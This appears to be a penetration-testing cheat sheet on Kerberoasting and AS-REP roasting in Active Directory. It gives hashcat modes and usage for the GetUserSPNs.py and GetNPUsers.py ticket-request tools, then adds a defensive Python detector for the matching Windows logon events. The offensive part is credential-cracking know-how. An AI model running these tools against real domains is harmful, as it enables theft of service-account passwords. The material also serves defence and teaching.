Roasting

Kerberoasting

In Active Directory, any authenticated domain user can request a Service Ticket (ST) for any domain account that has a Service Principal Name (SPN) registered for a service.

Service Tickets are partially encrypted with the Kerberos key (derived from the account password) of the account tied to the service. Thus, the service account's password can be cracked offline by trying to decrypt the ST with candidate passwords.

The hashcat mode for the default RC4-encrypted TGS-REP ticket is 13100.

Linux (Attacker)
GetUserSPNs.py [domain/username]<:password> <options>

OPTIONS
-hashes [LMHASH:NTHASH]            NTLM Hashes, Format is LMHASH:NTHASH
-dc-ip [IP]                        IP Address Of The Domain Controller
-outputfile [file]                 Output Filename
-request                           Requests TGS For Users
-format                            Hashcat | John

AS-REP Roasting

In Kerberos authentication, users normally perform Kerberos pre-authentication by sending the KDC a timestamp encrypted with the user's Kerberos key (derived from the account password).

If Kerberos pre-authentication is disabled for an account (the DONT_REQUIRE_PREAUTH flag is set), an attacker can request a TGT from the KDC as that account without knowing its password. The KDC's AS-REP response contains a part, including the session key, that is encrypted with the account's Kerberos key. That encrypted part can then be cracked offline to obtain the account's password.

The hashcat mode for the AS-REP ticket is 18200.

Linux (Attacker)
GetNPUsers.py [domain/username]<:password> <options>

OPTIONS
-hashes [LMHASH:NTHASH]            NTLM Hashes, Format is LMHASH:NTHASH
-dc-ip [IP]                        IP Address Of The Domain Controller
-outputfile [file]                 Output Filename
-request                           Requests AS-REP For Users
-format                            Hashcat | John
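A defender-side counterpart to both sections, added here as an example and not part of the original page: it checks whether an account's userAccountControl has DONT_REQUIRE_PREAUTH set, and flags the two roasting patterns in Windows Security log fields (Event 4769 RC4 service-ticket requests for many SPNs, and Event 4768 TGT requests with PreAuthType 0). The event records are constructed sample data, already parsed into dicts.

```python
from collections import defaultdict

# Windows / Active Directory values the checks rely on (real values, not constructed)
UF_DONT_REQUIRE_PREAUTH = 0x400000  # userAccountControl bit: "Do not require Kerberos preauthentication"
RC4_HMAC = 0x17                     # TicketEncryptionType for RC4-HMAC, the etype hashcat 13100/18200 crack
NO_PREAUTH = 0                      # PreAuthType in Event 4768 when the TGT was issued without pre-auth


def preauth_disabled(user_account_control: int) -> bool:
    """True if the account is exposed to AS-REP roasting (DONT_REQUIRE_PREAUTH set)."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)


def kerberoast_candidates(events, threshold=3):
    """Accounts that requested RC4 service tickets (Event 4769) for >= threshold distinct
    non-machine services. Legitimate clients rarely do this; AES-capable ones never need RC4."""
    services_per_user = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):  # TGT renewals and computer accounts are noise
            continue
        services_per_user[e["TargetUserName"]].add(svc)
    return {u: sorted(s) for u, s in services_per_user.items() if len(s) >= threshold}


def asrep_roast_events(events):
    """(requesting IP, account) pairs for TGT requests (Event 4768) that skipped pre-authentication."""
    hits = {(e["IpAddress"], e["TargetUserName"])
            for e in events if e["EventID"] == 4768 and e["PreAuthType"] == NO_PREAUTH}
    return sorted(hits)


# Constructed sample events (only the 4768/4769 fields the checks read, already parsed)
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "alice", "ServiceName": "svc_sql", "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "alice", "ServiceName": "svc_web", "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "alice", "ServiceName": "svc_backup", "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "alice", "ServiceName": "krbtgt", "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "bob", "ServiceName": "svc_sql", "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.7"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "PreAuthType": 0, "IpAddress": "10.0.0.5"},
    {"EventID": 4768, "TargetUserName": "carol", "PreAuthType": 2, "IpAddress": "10.0.0.9"},
]

if __name__ == "__main__":
    print("Possible Kerberoasting:", kerberoast_candidates(SAMPLE_EVENTS))
    print("AS-REP roasting exposure:", asrep_roast_events(SAMPLE_EVENTS))
```

Moving service accounts to AES-only keys and removing DONT_REQUIRE_PREAUTH where it is not needed takes away the RC4 material both hashcat modes crack, so these checks are most useful as a residual-exposure monitor after that cleanup.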
